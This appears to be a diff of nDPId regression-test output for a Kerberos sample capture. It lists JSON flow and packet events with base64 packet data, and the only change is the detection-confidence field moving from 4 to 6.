-00730{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337930193,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337930214,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAFNAAIAGkEysEAjJrBAICMAPAFhOqMfQDl0Bb1AYAQBFdgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4T+8E3pUi7h1ZsZOoIXjjwvAQAgQGpJXHn0jgIAIbXQei+GxBZQViNO7UVdhzj5KUys1PXrvG2C8wEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETocdNKgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
+00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337930214,"pkt":"AAgCHEeupB9ywglqCABFAACYE0tAAIAGfiOsEAgIrBAIyQBYwA8OXQcjTqjJD1AYAQBZNwAAQBgDyB6VZPxID+fu9kcivDlP7463Dy1IfrYrHVzuJLB3P27gpkccW43Mtu3NrktwKAyme0Z0QNo0JvH3ppwCLvPborHS7i5Jp9I5pxLf5LZX6AlmVea2udQa4ufUWkijqzhrShLiqrevOUKPGzj2OQ=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337930217,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1549337930217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337930217,"pkt":"pB9ywglqAAgCHEeuCABFAADBAFlAAIAGkOysEAjJrBAICMAQAFhuA\/SQrSTVxVAYAQACWAAAqoGWMIGToAMCARKigYsEgYhFQhzXcnmj64Ly0uBtjkMUoTuM+x\/rpAOTUWDkUHAspBDcB8geScaOnqOyTgnIEt9ORSbyaLGh7aDpqWoX8LkoU9AsGNn4U6LRjikWi59PfjQn46P9BY0tn6JOEZn\/IKW+bzyhJYK72MU5dfE\/Y9v1QP4pOcMGsyTXEkOUPDq6y5KpwHUNPs1e"} 
@@ -50,9 +48,9 @@ 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1549337931199,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1549337931199,"pkt":"AAgCHEeupB9ywglqCABFAABsE2VAAIAGfjWsEAgIrBAIyQBYwBJewuYoJDXRkVAYAQBPlQAA7mWAsz4LwR11oOSQ27Ex06YGG2bAP8ttVVXtAwxS755lCHRg4mUkpOjXnBJJ8KdHDkkp7LWBSVTLf+j0wkJ4hFVjx0c="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1549337931210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1549337931210,"pkt":"pB9ywglqAAgCHEeuCABFAAXAAHpAAIAGi8ysEAjJrBAICMATAFio5J72SB155lAYAQAvgAAAAAAFlGyCBZAwggWMoQMCAQWiAwIBDKOCBQcwggUDMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMR
bqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjkBvFbBksZRBZsgqvT9rWZWIMz104YLf86+Cksa0ZMsEGJ\/RDcCZOr8kPQRKlwzkm2uQjqkaOemu4sYhWXYr71KrOEs2JUveeWW4HHkLaYXd0a2yOtTAVV1zR76rPVw3Om2DZiy3OdOJiQuRn3tY6sCbzkX\/gKz0r0nI8miItgy4uzP0Z9rEEUiiCUR\/XkOkdTBzoAcDBQBAgQAAohAbDkhBUFBZQ1JBRlQuT1JHoycwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44sbqoEjAQAgESAgERAgEXAgEYAgL\/eQ=="} -00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} +00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 
02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1549337931211,"pkt":"AAgCHEeupB9ywglqCABFAAXUE2tAAIAGeMesEAgIrBAIyQBYwBNIHXnmqOSkjlAYAQDmlQAAAAAFqG2CBaQwggWgoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIEOGGCBDQwggQwoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6OCA+wwggPooAMCARKhAwIBAaKCA9oEggPWM37115K3Hp8wZkASHyq+pZzCB52w4ZkoKvxkfuUu0LiaHFeH\/YmBkYuC+Y2vHUb50xj2RvlJ0VUIhZ76+RSlQ21W8ccYNaNUXAdabNdF58x1VLmlxuTxbWyuhApe3nart0yE2ggJlqq+SXunnCj4pybyo3D5UqYJsd2CPwW\/UrYMlNJN1gTQgtBaL+rVhNBO6KW9AYxQ1t3V4\/aN5W98Rm9mtqvqy8JlwwSbsqtA+fkgyuLhaFI64sFXeg2okoVY+WpiV8y69YH3VrH9iOYXgjNBApUv8XW3Inwsdd+FJTBLBvDWG4tGHW9DGxqpa+jzaFQyiDi46S1MFPNG5ax\/fXZRFVyIKm5Uvcg+IVoFoTv79M+o2izKZu3xW5GT3jmX5joC1Jz2cBBvfj31IPUawr97kChTt3baVrRO5jtj4Qe\/Yf9D1ea6AnOL3m9lXfbWlkiRMtogdbiLBmz40fY6y7s2fBoNzUM7PPtzjMCZD+mzFnuxbn6SKFsq1jRXr1gfhz99U\/sj4rpgf0fGzuAji6\/CldJydoJ3ZF35EbOHxlT67B0T5Wdz2DSGMxMFnFTU2y41IZZAFsQkozjJDlJyV\/H3UNEgpsuzFWCdn70SJWivzXQmU387\/5qoLQgDt1DzqhRxVq84eAlKWowli8llAVqtdeTmpgPePJrGuN8afpBvekjwt\/1CNWyg0EdZHQFfl1jlAEsgIyCski92E8xu8mvOhuDWTPYemtkOSb2FcxtoxHDyT\/GouX7ARs1ZykSB8j3R9t9ImA7xedyZ34sFfJFGRcLyx6qpTKqFmVZRuxhX4QxBOD\/ubH8xUJ\/p2KhM0jR1yUcK5cyCfymWcxTybrHYNySjaI0gUlhRAiWvZM8bRaCC8Fvoak+VMcqFAYw\/ve5dkR7KuJ\/TxqmhnlpwuoDkayoCpyiqZLALWWLzMuA+erM0osdjgnLPkazewgaOuGK+L14eoN40NcSEI4LVjIf3MizcDep1bu4x++f34uKnDRQCxEnEkfmry2Kt7UmB9dRWUyMnIhre\/LcHyWzVYKmQzK4jbAZGQz3E7SgAtaF8YpuFzK+wN7Al3\/bnw+mNGEv8UnWesnu6eYSeTafPkSExr0eHjyMGHylq1SYGRDikN47BEUJ9DRohxwo4GIbZJ4SlXZm2o1CyYrdjxESgLw7oBxv5ojM77+mqWLxxRYcXrNOO62jI7OC10ISrQjw9VRI73l6ie75xGP23mwgzTkWksp2AmXFXEibjsoWoxN\/dqkJ1paHMQ4D49jni4b2qEd7LE7wiCkMzEEz1wgp
M028xFWhhGKaCASowggEmoAMCARKiggEdBIIBGXjHjK5feQ4HY+O2QW1CcrS7y98xjbx4G5\/F1UdYW0nRFrJ1ea7DBhGVKjGhvpNRa\/suoiAGgMaTxIusGGUQaAV3QBkZHI2P7w3S90dRv87TwzBiyLZFov6Iyju+rGIOEBeNij1u4+ieA37sl1WxkkeY5PDSqYQ0xi5dzSQDh1ZKJZF1swmboJUdCNAO5zs9II914vVd0a+gpHqPPfi\/aa\/2ENYesIfYc445XBAksieN4OCiUuXDZetEyUARPhuFnigdmrFcLiKa7lrUb+XOxw\/TpGzrNeFBj3QXNS06SOOdTL3pwlP77\/SR+78shwDam4sOlgv2UEV2H31TfNEKJs\/OC4Ks1WD8+3srLETa3NVngdje5im6AaSi"} -00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":1064,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":1064,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAARQAIFAAIAGjTWsEAjJrBAICMAVAFjnnRKZiyMmn1AYAQD\/uwAADkhBUFBZQ1JBRlQuT1JHoicwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQGiggPaBIID1jN+9deStx6fMGZAEh8qvqWcwgedsOGZKCr8ZH7lLtC4mhxXh\/2JgZGLgvmNrx1G+dMY9kb5SdFVCIWe+vkUpUNtVvHHGDWjVFwHWmzXRefMdVS5pcbk8W1sroQKXt52q7dMhNoICZaqvkl7p5wo+Kcm8qNw+VKmCbHdgj8Fv1K2DJTSTdYE0ILQWi\/q1YTQTuilvQGMUNbd1eP2jeVvfEZvZrar6svCZcMEm7KrQPn5IMri4WhSOuLBV3oNqJKFWPlqYlfMuvWB91ax\/YjmF4IzQQKVL\/F1tyJ8LHXfhSUwSwbw1huLRh1vQxsaqWvo82hUMog4uOktTBTzRuWsf312URVciCpuVL3IPiFaBaE7+\/TPqNosymbt8VuRk945l+Y6AtSc9nAQb3499SD1GsK\/e5AoU7d22la0TuY7Y+EHv2H\/Q9XmugJzi95vZV321pZIkTLaIHW4iwZs+NH2Osu7NnwaDc1DOzz7c4zAmQ\/psxZ7sW5+kihbKtY0V69YH4c\/fVP7I+K6YH9Hxs7gI4uvwpXScnaCd2Rd+RGzh8ZU+uwdE+Vnc9g0hjMTBZxU1NsuNSGWQBbEJKM4yQ5Sclfx91DRIKbLsxVgnZ+9EiVor810JlN\/O\/+aqC0IA7dQ86oUcVavOHgJSlqMJYvJZQFarXXk5qYD3jyaxrjfGn6Qb3pI8Lf9QjVsoNBHWR0BX5dY5QBLICMgrJIvdhPMbvJrzobg1kz2HprZDkm9hXMbaMRw8k\/xqLl+wEbNWcpEgfI90fbfSJgO8Xncmd+LBXyRRkXC8seqqUyqhZlWUbsYV+EMQTg\/7mx\/MVC
f6dioTNI0dclHCuXMgn8plnMU8m6x2Dcko2iNIFJYUQIlr2TPG0WggvBb6GpPlTHKhQGMP73uXZEeyrif08apoZ5acLqA5GsqAqcoqmSwC1li8zLgPnqzNKLHY4Jyz5Gs3sIGjrhivi9eHqDeNDXEhCOC1YyH9zIs3A3qdW7uMfvn9+Lipw0UAsRJxJH5q8tire1JgfXUVlMjJyIa3vy3B8ls1WCpkMyuI2wGRkM9xO0oALWhfGKbhcyvsDewJd\/258PpjRhL\/FJ1nrJ7unmEnk2nz5EhMa9Hh48jBh8patUmBkQ4pDeOwRFCfQ0aIccKOBiG2SeEpV2ZtqNQsmK3Y8REoC8O6Acb+aIzO+\/pqli8cUWHF6zTjutoyOzgtdCEq0I8PVUSO95eonu+cRj9t5sIM05FpLKdgJlxVxIm47KFqMTf3apCdaWhzEOA+PY54uG9qhHeyxO8IgpDMxBM9cIKTNNvMRVoYRg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -64,9 +62,9 @@ 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337931219,"pkt":"AAgCHEeupB9ywglqCABFAACbE31AAIAGfe6sEAgIrBAIyQBYwBcKhDl3bkbwtVAYAQD\/bQAAzmwvcX+5XppDtJZXr9PwDYLsp98Hk08TTktA1oPPxQHxyFPFFH6C9d30u8d8saioSDapQyKHHyGt004ct60erCJP9bUby12IBGHwYva7Ha2y2bxZxEn3nV+8BQON\/a2dluoxZFHPI4urPpSWS9H8dnzG6Q=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337931219,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/AJNAAIAGi7SsEAjJrBAICMAYAFg1TYdzLuLg4VAYAQBQtwAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJM
